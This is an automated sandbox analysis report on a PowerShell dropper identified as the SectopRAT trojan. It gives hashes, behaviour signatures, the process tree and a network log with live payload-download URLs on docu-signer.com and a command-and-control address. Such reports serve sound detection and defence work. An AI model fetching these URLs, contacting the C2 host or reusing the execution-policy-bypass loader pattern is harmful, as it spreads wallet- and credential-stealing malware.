Overview

overview

10

Static

static

1

SFHgtxFGtB.ps1

windows7-x64

3

SFHgtxFGtB.ps1

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/12/2024, 07:22 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SFHgtxFGtB.ps1

  • Size

    35KB

  • MD5

    6a34a3dbed524eed6d73c72188418d80

  • SHA1

    6a6ee1aa6ad9d9fbd7b7112df3a5c92b83c18667

  • SHA256

    45ab4ca2483759d89bc446e6797e86489eb08cfeb3f740440a83ff6d83eb5503

  • SHA512

    6fd7dc31836db3062aea0ab2bf0c7b0c45ee188fa9f2a872de968db2635aefc404d057444ec15ffea66585f6aa8e18acf2088e9523ac9138680ef6061465db30

  • SSDEEP

    96:YdgXCdz1ArDw1DQXZB08+uFk0WK49Ms00IYY+blwIAAwIYmEYsR0KkMEIIAAYwwP:EZu

Score
10/10
sectopratdiscoveryexecutionpersistenceratspywaretrojan

Malware Config

Signatures

  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 1 IoCs
  • Sectoprat family
    sectoprat
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\SFHgtxFGtB.ps1
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1900
    • C:\Users\Admin\AppData\Local\Temp\62650356\updater.exe
      "C:\Users\Admin\AppData\Local\Temp\62650356\updater.exe" C:\Users\Admin\AppData\Local\Temp\62650356\XCBjmNiG.dll
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious use of WriteProcessMemory
      PID:1992
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        3⤵
          PID:4272
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4832

    Network

    • flag-us
      DNS
      228.249.119.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      228.249.119.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      88.210.23.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      88.210.23.2.in-addr.arpa
      IN PTR
      Response
      88.210.23.2.in-addr.arpa
      IN PTR
      a2-23-210-88deploystaticakamaitechnologiescom
    • flag-us
      DNS
      71.31.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      71.31.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      docu-signer.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      docu-signer.com
      IN A
      Response
      docu-signer.com
      IN A
      172.67.142.2
      docu-signer.com
      IN A
      104.21.87.65
    • flag-us
      GET
      https://docu-signer.com/api/uz/0912545164/updater.bin
      powershell.exe
      Remote address:
      172.67.142.2:443
      Request
      GET /api/uz/0912545164/updater.bin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
      Host: docu-signer.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Tue, 17 Dec 2024 07:22:12 GMT
      Content-Type: application/octet-stream
      Content-Length: 893608
      Connection: keep-alive
      Last-Modified: Sun, 13 Oct 2024 09:57:05 GMT
      ETag: "670b9971-da2a8"
      Accept-Ranges: bytes
      cf-cache-status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7qY%2B%2FTmUTCPpvwrcSJsdtw4F%2B9LOW3UAj8GJwz0aiYIIouSnTrSZBgMWpIHotrWvbYZkvG11EzArBfsapeuvdZ3Mn1AziqrTflOhLF4wsGRnR7pi2EfBOKPcKjJHAhfy6Ik%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8f3529226ad3ef42-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=28617&min_rtt=26165&rtt_var=9405&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2999&recv_bytes=488&delivery_rate=102581&cwnd=253&unsent_bytes=0&cid=dc7a0aa304a13762&ts=173&x=0"
    • flag-us
      GET
      https://docu-signer.com/api/uz/0912545164/log4cxx.dll
      powershell.exe
      Remote address:
      172.67.142.2:443
      Request
      GET /api/uz/0912545164/log4cxx.dll HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
      Host: docu-signer.com
      Response
      HTTP/1.1 200 OK
      Date: Tue, 17 Dec 2024 07:22:15 GMT
      Content-Type: application/octet-stream
      Content-Length: 2011444
      Connection: keep-alive
      Last-Modified: Sun, 15 Dec 2024 11:15:42 GMT
      ETag: "675eba5e-1eb134"
      Accept-Ranges: bytes
      cf-cache-status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r6jB6OgVAxh2%2BaY7%2BcRk4iulMzdChovLZIFr9w2mc6%2F1AqW7wDJLvm4YsFcnqmeLMkBEgXyb8HBNzi%2BQZgvzpTnjxZn%2BoYn4%2BoYDtSY1agi7g2SQlt2nJSbwOVuwKOQPFp8%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8f352938e98def42-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=32966&min_rtt=25677&rtt_var=13506&sent=710&recv=375&lost=0&retrans=7&sent_bytes=910613&recv_bytes=682&delivery_rate=85033&cwnd=218&unsent_bytes=0&cid=dc7a0aa304a13762&ts=3732&x=0"
    • flag-us
      DNS
      2.142.67.172.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      2.142.67.172.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      236.124.147.185.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      236.124.147.185.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      28.118.140.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      28.118.140.52.in-addr.arpa
      IN PTR
      Response
    • flag-ru
      GET
      http://185.147.124.236:9000/wbinjget?q=03C896B1DF749923AAE30D910191B5B8
      MSBuild.exe
      Remote address:
      185.147.124.236:9000
      Request
      GET /wbinjget?q=03C896B1DF749923AAE30D910191B5B8 HTTP/1.1
      Host: 185.147.124.236:9000
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Cache-Control: no-cache
      Content-Length: 0
      Server: Microsoft-HTTPAPI/2.0
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
      Access-Control-Allow-Headers: *
      Access-Control-Expose-Headers:
      Accept: */*
      Accept-Language: en-US, en
      Accept-Charset: ISO-8859-1, utf-8
      Host: *:9000
      Date: Tue, 17 Dec 2024 07:22:28 GMT
      Connection: close
    • flag-us
      DNS
      212.20.149.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      212.20.149.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      241.42.69.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.42.69.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • 172.67.142.2:443
      https://docu-signer.com/api/uz/0912545164/log4cxx.dll
      tls, http
      powershell.exe
      65.8kB
       3.0MB
       1288
      2211

      HTTP Request

      GET https://docu-signer.com/api/uz/0912545164/updater.bin

      HTTP Response

      200

      HTTP Request

      GET https://docu-signer.com/api/uz/0912545164/log4cxx.dll

      HTTP Response

      200
    • 185.147.124.236:15647
      MSBuild.exe
      2.0MB
       51.2kB
       1444
      958
    • 185.147.124.236:9000
      http://185.147.124.236:9000/wbinjget?q=03C896B1DF749923AAE30D910191B5B8
      http
      MSBuild.exe
      343 B
       546 B
       5
      3

      HTTP Request

      GET http://185.147.124.236:9000/wbinjget?q=03C896B1DF749923AAE30D910191B5B8

      HTTP Response

      200
    • 8.8.8.8:53
      228.249.119.40.in-addr.arpa
      dns
      73 B
       159 B
       1
      1

      DNS Request

      228.249.119.40.in-addr.arpa

    • 8.8.8.8:53
      88.210.23.2.in-addr.arpa
      dns
      70 B
       133 B
       1
      1

      DNS Request

      88.210.23.2.in-addr.arpa

    • 8.8.8.8:53
      71.31.126.40.in-addr.arpa
      dns
      71 B
       157 B
       1
      1

      DNS Request

      71.31.126.40.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
       144 B
       1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      docu-signer.com
      dns
      powershell.exe
      61 B
       93 B
       1
      1

      DNS Request

      docu-signer.com

      DNS Response

      172.67.142.2
      104.21.87.65

    • 8.8.8.8:53
      2.142.67.172.in-addr.arpa
      dns
      71 B
       133 B
       1
      1

      DNS Request

      2.142.67.172.in-addr.arpa

    • 8.8.8.8:53
      236.124.147.185.in-addr.arpa
      dns
      74 B
       134 B
       1
      1

      DNS Request

      236.124.147.185.in-addr.arpa

    • 8.8.8.8:53
      28.118.140.52.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      28.118.140.52.in-addr.arpa

    • 8.8.8.8:53
      212.20.149.52.in-addr.arpa
      dns
      72 B
       146 B
       1
      1

      DNS Request

      212.20.149.52.in-addr.arpa

    • 8.8.8.8:53
      241.42.69.40.in-addr.arpa
      dns
      71 B
       145 B
       1
      1

      DNS Request

      241.42.69.40.in-addr.arpa

    • 8.8.8.8:53
      172.210.232.199.in-addr.arpa
      dns
      74 B
       128 B
       1
      1

      DNS Request

      172.210.232.199.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\62650356\XCBjmNiG.dll
      Filesize

      1.9MB

      MD5

      bcc04f3c8f29b9533c8aff0681d4eb4f

      SHA1

      2edb98e832959106bc3e6110dfb0a20a549bdcb1

      SHA256

      d0e19b9fed36046a80ca84c68624eeed3fac491962fc121d1d7b6433006990dc

      SHA512

      dcd54ae36962e5072be4b31e20bc7d42a4ff9d90e95930f09a0cbdb6e0f7495a38409defcacf072c8c452188dbbf4863f5f8e21a24f50d36ffdae61959176cf1

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\62650356\updater.exe
      Filesize

      872KB

      MD5

      c56b5f0201a3b3de53e561fe76912bfd

      SHA1

      2a4062e10a5de813f5688221dbeb3f3ff33eb417

      SHA256

      237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

      SHA512

      195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4l0ndww4.ehb.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmpF9D4.tmp
      Filesize

      20KB

      MD5

      49693267e0adbcd119f9f5e02adf3a80

      SHA1

      3ba3d7f89b8ad195ca82c92737e960e1f2b349df

      SHA256

      d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

      SHA512

      b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

      Download Submit

    • memory/1900-11-0x00007FFD31400000-0x00007FFD31EC1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1900-13-0x00007FFD31400000-0x00007FFD31EC1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1900-15-0x00007FFD31403000-0x00007FFD31405000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1900-16-0x00007FFD31400000-0x00007FFD31EC1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1900-17-0x00007FFD31400000-0x00007FFD31EC1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1900-12-0x00007FFD31400000-0x00007FFD31EC1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1900-0-0x00007FFD31403000-0x00007FFD31405000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1900-22-0x00007FFD31400000-0x00007FFD31EC1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1900-1-0x000001854A830000-0x000001854A852000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1992-24-0x0000000001640000-0x0000000001A40000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/4832-31-0x0000000005070000-0x0000000005102000-memory.dmp

      Filesize

      584KB

      Download

    • memory/4832-38-0x00000000062B0000-0x00000000067DC000-memory.dmp

      Filesize

      5.2MB

      Download

    • memory/4832-29-0x00000000747BE000-0x00000000747BF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4832-32-0x00000000056D0000-0x0000000005C74000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/4832-33-0x00000000054A0000-0x0000000005662000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/4832-34-0x00000000051A0000-0x0000000005216000-memory.dmp

      Filesize

      472KB

      Download

    • memory/4832-35-0x0000000005230000-0x0000000005280000-memory.dmp

      Filesize

      320KB

      Download

    • memory/4832-37-0x00000000747B0000-0x0000000074F60000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4832-36-0x0000000005150000-0x000000000515A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4832-30-0x0000000000400000-0x00000000004C6000-memory.dmp

      Filesize

      792KB

      Download

    • memory/4832-39-0x0000000005E40000-0x0000000005E5E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4832-40-0x0000000005F30000-0x0000000005F96000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4832-28-0x0000000000400000-0x00000000004C6000-memory.dmp

      Filesize

      792KB

      Download

    • memory/4832-58-0x0000000007C00000-0x0000000007C0A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4832-60-0x00000000747BE000-0x00000000747BF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4832-61-0x00000000747B0000-0x0000000074F60000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4832-62-0x00000000052F0000-0x0000000005302000-memory.dmp

      Filesize

      72KB

      Download

    • memory/4832-63-0x0000000005350000-0x000000000538C000-memory.dmp

      Filesize

      240KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.